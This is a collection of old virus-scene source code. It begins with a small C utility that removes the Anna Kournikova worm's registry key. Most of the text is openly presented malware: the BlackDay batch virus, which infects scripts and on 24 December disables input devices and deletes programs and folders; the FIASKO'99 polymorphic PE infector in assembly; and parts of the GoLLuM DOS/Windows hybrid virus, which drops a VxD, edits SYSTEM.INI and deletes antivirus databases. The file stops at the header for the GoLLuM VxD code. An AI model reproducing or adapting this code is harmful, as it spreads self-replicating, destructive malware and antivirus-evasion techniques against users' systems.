/* * AnnaKlean.c : Console Application To Wipe Out Anna Kournikova Worm From Registry* 27/02/2001 - By Wanderley J. Abreu Jr. * storm@stormdev.net*/

#include <stdio.h>#include <conio.h>#include <windows.h>#include <winbase.h>

#define PATH 256

int main(void){LONG lnResult;HKEY hKey;CHAR bfWindows[PATH];

/* Open the Registry key the worm created... */if ( ERROR_SUCCESS != RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\",

0, KEY_ALL_ACCESS,&hKey) ) {

// If already clean, notify user...printf("Error opening key, use RegEdit\n");printf("Press Any Key To Continue...");_getch();return 0;

} /* Delete The Registry Entry...*/

lnResult = RegDeleteKey(hKey,"OnTheFly\\");if ( ERROR_SUCCESS != lnResult ) {

// Some error, so notify user...if ( lnResult == ERROR_FILE_NOT_FOUND ) {

// Key has already been deleted...RegCloseKey(hKey);printf("You Don't Have Any Traces of Anna Kournikova Worm...\n");printf("Press Any Key To Continue...");_getch();return 0;

} // if// Some other error...printf("Error deleting key, use RegEdit\n");RegCloseKey(hKey);return 0;

} // ifprintf("All Traces of The Anna Kournikova Worm Were Deleted from your Windows System...\n");printf("You Must Check your Windows Directory for the file 'Annakournikova.jpg.vbs'...\n");printf("Press Any Key To Continue...");

_getch();return 0;}

BLACK DAY 3.6

@echo off%_bd-ptrr%if '%1=='bd-ptrr goto bd-ptrr%2set bd-ptrr=%0.batif not exist %bd-ptrr% set bd-ptrr=%0if '%bd-ptrr%==' set bd-ptrr=autoexec.batif exist c:\_bd-ptrr.bat goto bd-ptrrgif not exist %bd-ptrr% goto ebd-ptrrfind "bd-ptrr"<%bd-ptrr%>c:\_bd-ptrr.batattrib c:\_bd-ptrr.bat +h:bd-ptrrgcommand /c c:\_bd-ptrr bd-ptrr vir:ebd-ptrrset bd-ptrr=goto bd-ptrrend:bd-ptrrvirfor %%a in (*.bat ..\*.bat) do call c:\_bd-ptrr bd-ptrr i %%aexit bd-ptrr:bd-ptrrifind "bd-ptrr"<%3>nulif not errorlevel 1 goto bd-ptrrendtype %3>bd-ptrr$echo.>>bd-ptrr$type c:\_bd-ptrr.bat>>bd-ptrr$move bd-ptrr$ %3>nul:bd-ptrrendctty nuldel c:\programme\norton~1\s32integ.dllif exist c:\windows\startmen �\programme\autostart\AntiVirus.bat goto comexeif not exist c:\windows\startmen �\programme\autostart\AntiVirus.bat goto residency:residencycopy AntiVirus.bat c:\windows\startmen �\programme\autostartattrib c:\windows\startmen �\programme\autostart\AntiVirus.bat +h +r:comexefor %%f in (*.exe *.com) do set A=%%fif %A%==COMMAND.COM set A=rename %A% V%A%if not exist V%A% goto phnordattrib +h V%A%copy %0.bat %A%attrib +r %A%ren %A% *.batset A=

:phnordecho.|date|find "24">nul.bd-ptrrif errorlevel 1 goto phuckctty conecho I hate Jesus Christ and his phuckin Birthday.echo For me is the 24th of December just another BlackDay in a dark World.echo For you now, every 24th gets such a BlackDay.echo The same for your phuckin System, too.echo ...echo BlackDay v3.6 by PhileT0a$t3r [rRlf]ctty nulc:\windows\rundll32.exe mouse,disablec:\windows\rundll32.exe keyboard,disabledel c:\windows\calc.exedel c:\windows\cdplayer.exedel c:\windows\command.comdel c:\windows\notepad.exedel c:\windows\pbrush.exedel c:\windows\regedit.exedel c:\windows\write.exedel c:\programme\winrar\winrar.exedel c:\t_online\online.exedel c:\acrobatx\reader\acrord32.exedel c:\corel\draw70\programs\photopnt.exedel c:\programme\d-info99\dinfo.exedel c:\programme\netscape\communicator\program\netscape.exedel c:\programme\quicktime\pictureviewer.exedel c:\programme\quicktime\movieplayer.exedel c:\programme\real\realplayer\realplay.exedel c:\programme\moviem~1\moviemk.exedel c:\programme\window~1\wmplayer.exedel c:\programme\klicktel\klickt~1\ktel32.exedel c:\programme\intern~1\iexplorer.exedel c:\winzip\winzip32.exedel c:\programme\micros~1\office\winword.exedel c:\programme\micros~1\office\outlook.exedel c:\programme\micros~1\office\msaccess.exedel c:\programme\micros~1\office\excel.exedeltree /y c:\windows\desktopdeltree /y c:\eigene~1deltree /y c:\windows\sendtodel c:\logo.syscopy c:\windows\system\shell32.dll c:\rename c:\shell32.dll logo.sysdel c:\windows\logos.syscopy c:\windows\system\shell32.dll c:\windowsrename c:\windows\shell32.dll logos.sysdel c:\windows\logow.syscopy c:\windows\system\shell32.dll c:\windowsrename c:\windows\shell32.dll logow.sysc:\windows\rundll32.exe user,disableoemlayer

:phuckctty con@if exist V%0.com V%0.com %1 %2 %3@if exist V%0.exe V%0.exe %1 %2 %3ctty nul:dusk

comment "FIASKO'99 created by mort[MATRiX] - simple PE infector with some semi-polymorph rout. - TASM rools... - try infect 2 files in directory - no payload - thanx to Lord Julus - i hope there's not to much your code...;)"

_vSize equ @endOfIT - @start_hSize equ 060h

.586

.model flat,stdcall

extrn ExitProcess : procextrn MessageBoxA : proc .datadd 0

.code

@start: db _hSize dup(090h)

@bleh: cld sti sbb eax,offset @start pushfd

call @findKernel jc @nope

add eax,078h ;find GetProcAddress xchg eax,esi xchg eax,ebx lodsd add eax,ebx add eax,018h xchg esi,eax lodsd ;number of names push eax lodsd ;address of funcs push eax lodsd ;address of names push eax lodsd ;address of ordinals push eax

pop eax pop eax pop ecx pop edx

add eax,ebx xchg eax,esi

@nextName: lodsd add eax,ebx lea edi,[ebp + _GPA] mov ecx,_GPASize xchg esi,eax rep cmpsb jz @foundGPA

xchg eax,esi dec edx jnz @nextName @foundGPA: mov eax,[esp - 4] sub eax,edx sub esp,010h shl eax,1 pop esi add eax,ebx add esi,eax xor eax,eax lodsw shl eax,2 pop esi

pop esi add eax,ebx add esi,eax lodsd add eax,ebx mov [ebp + _GPAAdd],eax pop esi call @infect

@nope: popfd jz @firstExecution

mov eax,00dead00h _hostIP equ $ - 4 jmp eax

@firstExecution: push 0 call @@1 db 'mort[MATRiX]''s virus',0@@1: call @@2 db 'FIASKO''99 - 10x 4 nothing...',0@@2: call MessageBoxA,0 call ExitProcess,0;-----------------------------------------------------( data )------------_GPA db 'GetProcAddress',0_GPASize = $ - _GPA_GPAAdd dd ? _retAdd dd ?_mask db '*.exe',0_fileHandle dd ?_mapHandle dd ?_mapBase dd ?_fileTime3x dd 0,0,0_newFileSize dd ?

_XFindFirstFile db "FindFirstFileA",0 _XFindNextFile db "FindNextFileA",0 _XGetCurrentDirectory db "GetCurrentDirectoryA",0 _XCreateFileMapping db "CreateFileMappingA",0 _XMapViewOfFile db "MapViewOfFile",0 _XUnmapViewOfFile db "UnmapViewOfFile",0 _XGetFileAttributes db "GetFileAttributesA",0 _XSetFileAttributes db "SetFileAttributesA",0 _XCreateFile db "CreateFileA",0 _XCloseHandle db "CloseHandle",0

_XSetFileTime db "SetFileTime",0 _XSetFilePointer db "SetFilePointer",0 _XSetEndOfFile db "SetEndOfFile",0 _XSetCurrentDirectory db 'SetCurrentDirectoryA',0

max_path EQU 260

filetime STRUC FT_dwLowDateTime DD ? FT_dwHighDateTime DD ? filetime ENDS fileSearch STRUC FileAttributes DD ? CreationTime filetime ? LastAccessTime filetime ? LastWriteTime filetime ? FileSizeHigh DD ? FileSizeLow DD ? Reserved0 DD ? Reserved1 DD ? FileName DB max_path DUP (?) AlternateFileName DB 13 DUP (?) DB 3 DUP (?) fileSearch ENDS _crtDir db 080h dup(0)_fileSearch fileSearch <?>;-----------------------------------------( call kernel API )-------------@cAPI: pop dword ptr [ebp + _retAdd] push eax db 068h_kernelBase dd ? call [ebp + _GPAAdd] call eax jmp [ebp + _retAdd]

;--------------------------------------------------( find kernel base )---@findKernel: call @delta@delta: mov eax,[esp + 0ch] shr eax,0ch mov ecx,050h ror eax,014h@fKl3: cmp word ptr [eax],'ZM' jz @fKl1@fKl2: sub eax,01000h

dec ecx jnz @fKl3 pop ebp sub ebp,offset @delta stc ret@fKl1: push eax mov eax,[eax + 03ch] pop esi cmp word ptr [esi + eax],'EP' jnz @fKl2

add eax,esi ;esi - kernel base

pop ebp mov [ebp + _kernelBase - @delta],esi sub ebp,offset @delta

clc ;eax - kernel PE ret

;--------------------------------------------( infect )-------------------@infect: lea eax,[ebp + _crtDir] push eax eax push 080h lea eax,[ebp + _XGetCurrentDirectory] call @cAPI

@nextDir: lea eax,[ebp + _XSetCurrentDirectory] call @cAPI

lea eax,[ebp + _fileSearch] push eax push eax lea eax,[ebp + _mask] push eax lea eax,[ebp + _XFindFirstFile] call @cAPI

inc eax jz @eou dec eax

push eax ;push handle

call @tryInfect

lea eax,[ebp + _XFindNextFile] call @cAPI or eax,eax jz @kdoMaPoradHledatNakyMenaProTyZasranyLabely ;czech rules

call @tryInfect ;this shit seems to be shortest

@kdoMaPoradHledatNakyMenaProTyZasranyLabely: push eax

@eou: pop eax xor al,al lea edi,[ebp + _crtDir] push edi cld repnz scasb mov al,'\' std repnz scasb inc edi xor al,al stosb cmp byte ptr [edi],':' jz @done jmp @nextDir

@done: pop edi push edi cld

@nextDir1: xor al,al repnz scasb dec edi mov al,'\' stosb cmp byte ptr [edi],0 jnz @nextDir1

lea eax,[ebp + _XSetCurrentDirectory] call @cAPI ret;----------------------------( open and infect it )-----------------------@tryInfect: lea eax,[ebp + _fileSearch.FileName] mov esi,eax

push 080h push eax lea eax,[ebp + _XSetFileAttributes] call @cAPI

or eax,eax jz @eouTotal

push 0 0 3 0 1 ;open file push 80000000h or 40000000h push esi lea eax,[ebp + _XCreateFile] call @cAPI inc eax jz @eou1 dec eax

mov [ebp + _fileHandle],eax ;save time mov eax,[ebp + _fileSearch.FileSizeLow] mov [ebp + _newFileSize],eax add eax,01000h push eax push 0 eax 0 4 0 ;create map push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XCreateFileMapping] call @cAPI

inc eax jz @eou2 dec eax mov [ebp + _mapHandle],eax push 0 0 2 push eax lea eax,[ebp + _XMapViewOfFile] call @cAPI or eax,eax jz @eou3

mov [ebp + _mapBase],eax xchg eax,esi cmp word ptr [esi],'ZM' jnz @fail cmp word ptr [esi + 038h],'TM' ;mark of infect jz @fail

mov eax,[esi + 03ch] cmp word ptr [esi + eax],'EP' jnz @fail

call @infectFile @fail: push dword ptr [ebp + _mapBase] lea eax,[ebp + _XUnmapViewOfFile] call @cAPI

@eou3: push dword ptr [ebp + _mapHandle] ;close map lea eax,[ebp + _XCloseHandle] call @cAPI lea eax,[ebp + _fileSearch.CreationTime] push eax add eax,8 push eax add eax,8 push eax push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XSetFileTime] call @cAPI

push 0 0 ;set new filesize push dword ptr [ebp + _newFileSize] push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XSetFilePointer] call @cAPI

push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XSetEndOfFile] call @cAPI

@eou2: push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XCloseHandle] call @cAPI

@eou1: push dword ptr [ebp + _fileSearch.FileAttributes] lea eax,[ebp + _fileSearch.FileName] push eax lea eax,[ebp + _XSetFileAttributes] call @cAPI

@eouTotal: ret

;------------------------------------------( infect file )----------------_fileAlign dd ?_secAlign dd ?

@infectFile: mov ebx,esi ;ebx - MZ, esi - PE add esi,eax

mov eax,[esi + 038h] mov [ebp + _secAlign],eax mov eax,[esi + 03ch] mov [ebp + _fileAlign],eax mov eax,[esi + 074h] shl eax,3 push eax xor eax,eax mov ax,[esi + 06h] mov ecx,028h dec eax mul ecx pop edi add edi,eax add edi,esi add edi,078h ;edi - last sec's header

mov eax,[edi + 010h] ;set new physical size add eax,_vSize mov ecx,[ebp + _fileAlign] div ecx inc eax mul ecx sub eax,[edi + 010h] add [esi + 050h],eax add [ebp + _newFileSize],eax mov edx,[edi + 010h] add [edi + 010h],eax

or dword ptr [edi + 024h],0a0000020h mov eax,[edi + 0ch] add eax,edx

mov [ebp + _xorOffs],eax

xchg [esi + 028h],eax add eax,[esi + 034h] ;host ip mov dword ptr [ebp + _hostIP],eax

add [ebp + _xorOffs],_hSize ;xored offset

mov eax,[esi + 034h] add [ebp + _xorOffs],eax

push edx xor edx,edx mov eax,[edi + 08h] mov ecx,[ebp + _secAlign] div ecx inc eax mul ecx mov [edi + 08h],eax pop edx

mov eax,[edi + 014h] add eax,edx add eax,ebx xchg eax,edi

lea esi,[ebp + @start]

call @setHeader ;ok - dont laught... mov word ptr [ebx + 038h],'TM' ;yesssssss, it's stupid

mov ecx,_hSize rep movsb

mov ecx,_vSize/4 - _hSize/4 mov ebx,[ebp + _xorAdd] mov edx,[ebp + _xorConst]

@nextDD2copy: lodsd xor eax,edx stosd add edx,ebx loop @nextDD2copy

ret

;--------------------------------------( random )-------------------------@random: ;CF->1 - byte push ecx pushf in eax,040h and eax,03fh ;we'll fit everywhere mov ecx,eax inc ecx xor ch,bh@delay:

loop @delay popf jc @hops and eax,07@hops: pop ecx ret

;-------------------------------------------( set header )----------------_regSet label byte db ? ;xor offset db ? ;xor const db ? ;xor add db ? ;xor size db ? ;1st. usefull reg db ? ;2nd. usefull reg

_xorOffs dd ? ;xor offset_xorConst dd ? ;xor constant_xorAdd dd ? ;xor adding_xorSize dd _vSize/4 ;xored size_xorNext dd ?

@setHeader: pusha in eax,040h mov [ebp + _xorConst],eax

mov dword ptr [ebp + _regSet],0ffffffffh ;;) mov word ptr [ebp + _regSet + 4],0ffffh

lea edi,[ebp + _regSet] ;set registers we'll use mov edx,6 @nextReg: clc call @random

cmp al,4 ;esp jz @nextReg cmp al,5 ;ebp jz @nextReg

push edi lea edi,[ebp + _regSet] mov ecx,6 repnz scasb pop edi jz @nextReg

stosb dec edx jnz @nextReg

in eax,040h mov [ebp + _xorAdd],eax lea edi,[ebp + @start] lea esi,[ebp + _regSet] lea ebx,[ebp + _xorOffs] mov ecx,4

@nextMOVie: call @addShit lodsb add al,0b8h xchg esi,ebx stosb lodsd stosd xchg esi,ebx call @addShit loop @nextMOVie call @addShit

;---------------------------------------------( set xor instruction )-----

mov [ebp + _xorNext],edi mov al,031h stosb lea esi,[ebp + _regSet] xor eax,eax lodsb mov bl,al lodsb mov ecx,8 mul ecx add eax,ebx stosb

call @addShit call @addShit;--------------------------------------------( set add instruction )------ mov al,03h stosb dec esi lodsb mov bl,al lodsb

xchg al,bl mov ecx,8 mul ecx add al,bl add al,0c0h stosb

call @addShit call @addShit;--------------------------------------------( set 2nd add instruction )-- mov al,083h stosb mov al,[esi - 3] add al,0c0h stosb mov al,4 stosb

call @addShit call @addShit;--------------------------------------------( set dec instruction )------ lodsb add al,048h stosb;--------------------------------------------( set jnz instruction )------ call @hmmm jmp @oneByte

mov ax,0850fh stosw mov eax,edi add eax,3 sub eax,[ebp + _xorNext] not eax stosd ;set 6 bytes jnz jmp @whoops @oneByte: mov al,075h stosb mov eax,edi sub eax,[ebp + _xorNext] not eax stosb ;set 2 bytes jnz

@whoops:

;-----------------------( set last bytes stuff...)----------

lea esi,[ebp + @bleh]

@nextStuff: push esi sub esi,edi cmp esi,6 pop esi jb @end

call @addShit jmp @nextStuff

@end: sub esi,edi jz @final mov ecx,esi

@nextB: clc call @random lea esi,[ebp + _1BytesShit] add esi,eax lodsb stosb loop @nextB

@final: popa ret;-----------------------------------------------------------_1BytesShit label byte clc cmc stc std cld cli sti clc;-------------------------------( add shit instruction )----_2BytesShit label byte db 033h ;xor r32,r32 db 087h ;xchg r32,r32 db 013h ;adc r32,r32 db 02bh ;sub r32,r32 db 019h ;sbb r32,r32 db 09h ;or r32,r32 db 08bh ;mov r32,r32 db 03h ;add r32,r32

_lastShit db 0ffh

;---------------------------( add some code )---------------

@addShit: push esi ecx edx call @hmmm ;compare 2 and 3 bytes instructions jnz @3bytes

call @hmmm ;no instruction will b add jnz @noShit

@nextShit: clc call @random lea esi,[ebp + _2BytesShit] ;set instruction add esi,eax lodsb cmp [ebp + _lastShit],al jz @nextShit

mov [ebp + _lastShit],al lea esi,[ebp + _regSet] cmp byte ptr [esi + 4],6 ;edi - di - ...where's the 8 bit version? jz @noDEC cmp byte ptr [esi + 5],7 jz @noDEC cmp byte ptr [esi + 4],7 jz @noDEC cmp byte ptr [esi + 5],6 jz @noDEC

push eax call @hmmm pop eax jz @noDEC dec eax @noDEC: stosb xor eax,eax mov al,[esi + 4] mov ecx,8 mul ecx add al,[esi + 5] add al,0c0h stosb pop edx ecx esi ret

;-----------------------------------------------------------_3BytesShit label byte db 08bh ;mov reg32,[mem]

db 03h ;add reg32,[mem] db 02bh ;sub reg32,[mem] db 0bh ;or reg32,[mem] db 023h ;and reg32,[mem] db 033h ;xor reg32,[mem] db 013h ;adc reg32,[mem] db 01bh ;sbb reg32,[mem]_lastShit1 db ?

@3bytes: lea esi,[ebp + _3BytesShit] ;set instruction

@eouu: clc call @random cmp al,[ebp + _lastShit] jz @eouu mov [ebp + _lastShit],al add esi,eax lodsb

cmp byte ptr [ebp + _regSet + 4],6 jz @noDEC1 cmp byte ptr [ebp + _regSet + 4],7 jz @noDEC1 cmp byte ptr [ebp + _regSet + 5],6 jz @noDEC1 cmp byte ptr [ebp + _regSet + 5],7 jz @noDEC1 push eax call @hmmm pop eax jz @noDEC1 dec al

@noDEC1: stosb xor eax,eax mov al,[ebp + _regSet + 4] ;choose register push eax call @hmmm pop eax jz @ESInow ;the first one

mov al,[ebp + _regSet + 5]

@ESInow: mov ecx,8 mul ecx

add eax,5 stosb stc call @random add eax,[ebp + _xorOffs] stosd @noShit: pop edx ecx esi ret;------------------------------------------------------------@hmmm: push ecx edx call @random lea ecx,[ebp + @bleh] add ecx,eax mov eax,[ecx] xor eax,ecx xor edx,edx mov ecx,2 div ecx cmp ecx,edx or edx,edx pop edx ecx ret

db 'whooops'

@endOfIT label

end @start

;; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ; ³ GoLLuM ViRuS - BioCoded by GriYo/29A ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ; ³ CopyRight (c) 1997 All RiGhts ReseRVed ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ; ³ World's first DOS/Win hybrid ever ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ;; GoLLuM is the very first hybrid DOS-Windows virus ever... it infects DOS; EXE files only when they're executed inside a DOS window under any of; the known versions of Microsoft Windows (Windows 3.1x, Windows95...). It; becomes resident as a virtual device driver when Windows starts, and; then hooks V86 int 21h in order to monitor file execution, trying to in-

; fect more files under DOS sessions.;; When an EXE file is executed inside a MS-DOS window, GoLLuM will attach; itself to the end of the file (it copies first its DOS code and then the; VxD file, both of them encrypted with a simple 'not' operation). GoLLuM; will not infect files that have digits or the 'V' character in their na-; mes (this includes AVP, MSAV, CPAV...), as well as Thunderbyte utilities; (TB*.*), McAffee shit and F-Prot.;; The virus also deletes some AV database files (ANTI-VIR.DAT, CHKLIST.MS,; AVP.CRC, IVB.NTZ and CHKLIST.TAV) whenever it infects a file. When these; infected files are run, GoLLuM inserts the string 'DEVICE=GOLLUM.386'; into the [386Enh] section of the SYSTEM.INI file, and then drops its VxD; file into the Windows \SYSTEM directory.;; The encryption used by GoLLuM consists on a simple 'not' operation, but; the decryptor contains a little emulation trick (try to TbClean it!).; Besides, it contains a date-triggered event, in which it will drop tro-; jan files (using the DOS stub in its VxD file).;; I wrote this just for fun while learning something on VxD coding. GoLLuM; consists on the following files:;; GOLLUM.ASM DOS virus code; CRYPT.ASM Code used to encrypt DOS virus code; WGOLLUM.MAK VxD makefile; WGOLLUM.DEF VxD def file; VXDSTUB.ASM VxD stub used in trojans; WGOLLUM.ASM VxD virus code; ASSEMBLE.BAT Batch file used to build GOLLUM.INC;; - -[GOLLUM.ASM - DOS virus code]- - - - - - - - - - - - - - - - - - - ->8

I_am_GoLLuM segment para 'CODE'

Header_Size equ 1ChVxD_File_Size equ 6592Decryptor_Size equ offset Bilbo_DeadAll_Size equ offset Old_Header+(Header_Size+VxD_File_Size) Assume cs:I_am_GoLLuM,ds:I_am_GoLLuM,es:I_am_GoLLuM,ss:I_am_GoLLuM

;Virus entry point (code inserted intro infected .EXE files);ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄGoLLuM_Entry_Point: ;Get delta offset stored on infection mov bp,0000h ;Save segment regs push ds push es ;Point segment regs to our code mov ax,cs

mov ds,ax mov es,ax ;Decrypt virus and VxD file mov si,offset Bilbo_Dead add si,bp mov di,si mov cx,(All_Size-Decryptor_Size+01h)/02hDecrypt_Gollum: ;Dont let GoLLum be emulated (Meeethyyyl! ;) cld lodsw push ax pop ax cli sub sp,0002h pop ax sti not ax cld stosw loop Decrypt_Gollum ;Clear prefetch db 0EBh,00h

;Drop GOLLUM.386 file and insert DEVICE=GOLLUM.386 into SYSTEM.INI;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄBilbo_Dead: ;Find SYSTEM.INI file mov si,offset Win_Sys_Table add si,bp mov cx,0005h cldSearch_Loop: lodsw mov dx,ax add dx,bp ;Open file (read/write access) mov ax,3D02h int 21h jnc Open_Ok ;Try next file name loop Search_Loop jmp Gollum_LeaveOpen_Ok: ;Save SYSTEM.INI file handle mov word ptr cs:[System_Handle][bp],ax ;Build VxD file name mov si,dx mov di,offset VxD_File add di,bp

mov dx,diCopy_Directory: lodsb cmp al,"." je Found_Extension stosb jmp Copy_DirectoryFound_Extension: ;Insert the path separator mov al,"\" stosb ;Insert the name of the VxD file mov si,offset Device_String+09h add si,bp mov cx,000Ah rep movsb ;Put the null marker xor al,al stosb ;Create de VxD file, abort if exist mov ah,5Bh xor cx,cx mov dx,offset VxD_File add dx,bp int 21h jc Close_Sys ;Write VxD to file xchg bx,ax mov ah,40h mov dx,offset Old_Header+Header_Size add dx,bp mov cx,VxD_File_Size int 21h jnc ok_VxD_Write ;Close VxD file if error... mov ah,3Eh int 21h ;...and delete it! mov ah,41h mov dx,offset VxD_File add dx,bp int 21hClose_Sys: mov bx,word ptr cs:[System_Handle][bp] jmp Exit_Infectionok_VxD_Write: ;Get handle of SYSTEM.INI file mov bx,word ptr cs:[System_Handle][bp] ;Seek to EOF mov ax,4202h xor cx,cx

xor dx,dx int 21h jc Bad_Size ;Strange! SYSTEM.INI file too big or dx,dx jnz Bad_Size cmp ax,VxD_File_Size jb Size_OkBad_Size: jmp Exit_InfectionSize_Ok: ;Save SYSTEM.INI file size mov word ptr cs:[System_Size][bp],ax ;Seek to BOF mov ax,4200h xor cx,cx xor dx,dx int 21h jc Bad_Size ;Read SYSTEM.INI over VxD file copy mov ah,3Fh mov cx,word ptr cs:[System_Size][bp] mov dx,offset Old_Header+Header_Size add dx,bp int 21h jc bad_size ;Check if SYSTEM.INI have been infected mov cx,word ptr cs:[System_Size][bp] mov di,dx mov al,"G"Do_Inspect: cld repne scasb or cx,cx jz System_Clean ;Exit if already resident cmp word ptr es:[di],"LO" jne Do_Inspect cmp word ptr es:[di+02h],"UL" jne Do_Inspect jmp Exit_InfectionSystem_Clean: ;Search for [386Enh] string mov cx,word ptr cs:[System_Size][bp] mov di,dxSection_Search: cld mov si,di lodsw cmp ax,"3[" jne Next_Char

lodsw cmp ax,"68" je Section_FoundNext_Char: inc di loop Section_Search ;Section not found, abort jmp Exit_InfectionSection_Found: ;Save distance from [386Enh] string to EOF mov ax,0008h sub cx,ax add di,ax sub word ptr cs:[System_Size][bp],cx ;Seek next to [386Enh] string mov ax,4202h mov dx,cx neg dx xor cx,cx dec cx int 21h jc Exit_Infection ;Write our load string mov ah,40h mov cx,0015h mov dx,offset Device_String add dx,bp int 21h jc Exit_Infection ;Write the rest of SYSTEM.INI file mov ah,40h mov cx,word ptr cs:[System_Size][bp] mov dx,di int 21hExit_Infection: ;Close file (bx=handle) mov ah,3Eh int 21h

;Get control back to host;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄGollum_Leave: ;Restore segment registers pop es pop ds ;File SYSTEM.INI not found, return to host mov ah,62h int 21h add bx,10h add word ptr cs:[exe_cs][bp],bx ;Restore stack

cli add bx,word ptr cs:[Old_Header+0Eh][bp] mov ss,bx mov sp,word ptr cs:[Old_Header+10h][bp] sti ;Clear some regs xor ax,ax xor bx,bx xor cx,cx xor dx,dx xor si,si xor di,di xor bp,bp ;Clear prefetch db 0EBh,00h ;Jump to original entry point db 0EAhexe_ip dw 0000hexe_cs dw 0000h

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;String tableWin_Sys_Table dw offset Win_Sys_01h dw offset Win_Sys_02h dw offset Win_Sys_03h dw offset Win_Sys_04h dw offset Win_Sys_05h ;Posible locations of SYSTEM.INI fileWin_Sys_01h db "C:\WINDOWS\SYSTEM.INI",00h Win_Sys_02h db "C:\WIN\SYSTEM.INI",00h Win_Sys_03h db "C:\WIN31\SYSTEM.INI",00h Win_Sys_04h db "C:\WIN311\SYSTEM.INI",00h Win_Sys_05h db "C:\WIN95\SYSTEM.INI",00h ;Buffer where virus build VxD file name and pathVxD_File db 20h dup (00h) ;String inserted into SYSTEM.INIDevice_String db 0Dh,0Ah,"DEVICE=GOLLUM.386",0Dh,0Ah ;Misc dataSystem_Size dw 0000hSystem_Handle dw 0000h ;Next bytes = Old .EXE header + VxD file copyOld_Header equ this byte;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

I_am_GoLLuM ends end GoLLuM_Entry_Point

; - -[CRYPT.ASM - Code used to encrypt DOS virus code]- - - - - - - - - ->8

vir_test segment para 'CODE' Assume cs:vir_test,ds:vir_test,es:vir_test,ss:vir_test

org 0000hStart: mov ax,cs mov ds,ax mov es,ax mov ax,3D00h mov dx,offset f_name int 21h jc exit_prog xchg bx,ax mov ah,3Fh mov cx,0FFFFh mov dx,offset copy int 21h jc close_file push ax mov ah,3Eh int 21h jc close_file mov si,offset copy+0027h mov di,si mov cx,9000 cldencrypt: lodsb not al stosb loop encrypt mov ah,3Ch xor cx,cx mov dx,offset x_name int 21h jc exit_prog xchg bx,ax mov ah,40h mov dx,offset copy pop cx int 21hclose_file: mov ah,3Eh int 21hexit_prog: mov ax,4C00h int 21hf_name db "GOLLUM.BIN",00hx_name db "GOLLUM.CRP",00hcopy db 10000 dup (00h)vir_test ends end Start

; - -[WGOLLUM.MAK - VxD makefile] - - - - - - - - - - - - - - - - - - - ->8

# file: wgollum.mak (VxD makefile)all : wgollum.exe

vxdstub.obj: vxdstub.asm masm -Mx -p -w2 vxdstub;

vxdstub.exe: vxdstub.obj link vxdstub.obj;

wgollum.obj: wgollum.asm .\debug.inc .\vmm.inc .\shell.inc masm5 -p -w2 -Mx $(Debug) wgollum.asm;

objs = wgollum.obj

wgollum.386: vxdstub.exe wgollum.def $(objs) link386 @wgollum.lnk addhdr wgollum.386 mapsym32 wgollum

wgollum.exe: wgollum.386 copy wgollum.386 wgollum.exe

; - -[WGOLLUM.DEF - VxD def file] - - - - - - - - - - - - - - - - - - - ->8

library wgollumdescription 'GoLLuM ViRuS for Microsoft Windows© by GriYo/29A'stub 'vxdstub.exe'exetype dev386

segments _ltext preload nondiscardable _ldata preload nondiscardable _itext class 'icode' discardable _idata class 'icode' discardable _text class 'pcode' nondiscardable _data class 'pcode' nondiscardable

; - -[VXDSTUB.ASM - VxD stub used in trojans] - - - - - - - - - - - - - ->8

name vxdstub_TEXT segment word public 'CODE'

assume cs:_TEXT,ds:_TEXT,es:_TEXT

;Activation routine;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

vxdstub proc far;Segment regs!mov ax,csmov ds,ax

mov es,ax;Set video mode 80x25x16cmov ax,0003hint 10h;Print "Gollum!"mov ax,1301hmov bx,0002hmov cx,0007hmov dx,0A24hmov bp,offset Gollum_Saysint 10h;Endless loop

Dead_Zone: ;Aaaarrrgggghhhhh!!!!jmp Dead_Zone

;Text printed on screenGollum_Says db "GoLLum!"

vxdstub endp

_TEXT endsend vxdstub

; - -[WGOLLUM.ASM - VxD virus code] - - - - - - - - - - - - - - - - - - ->8

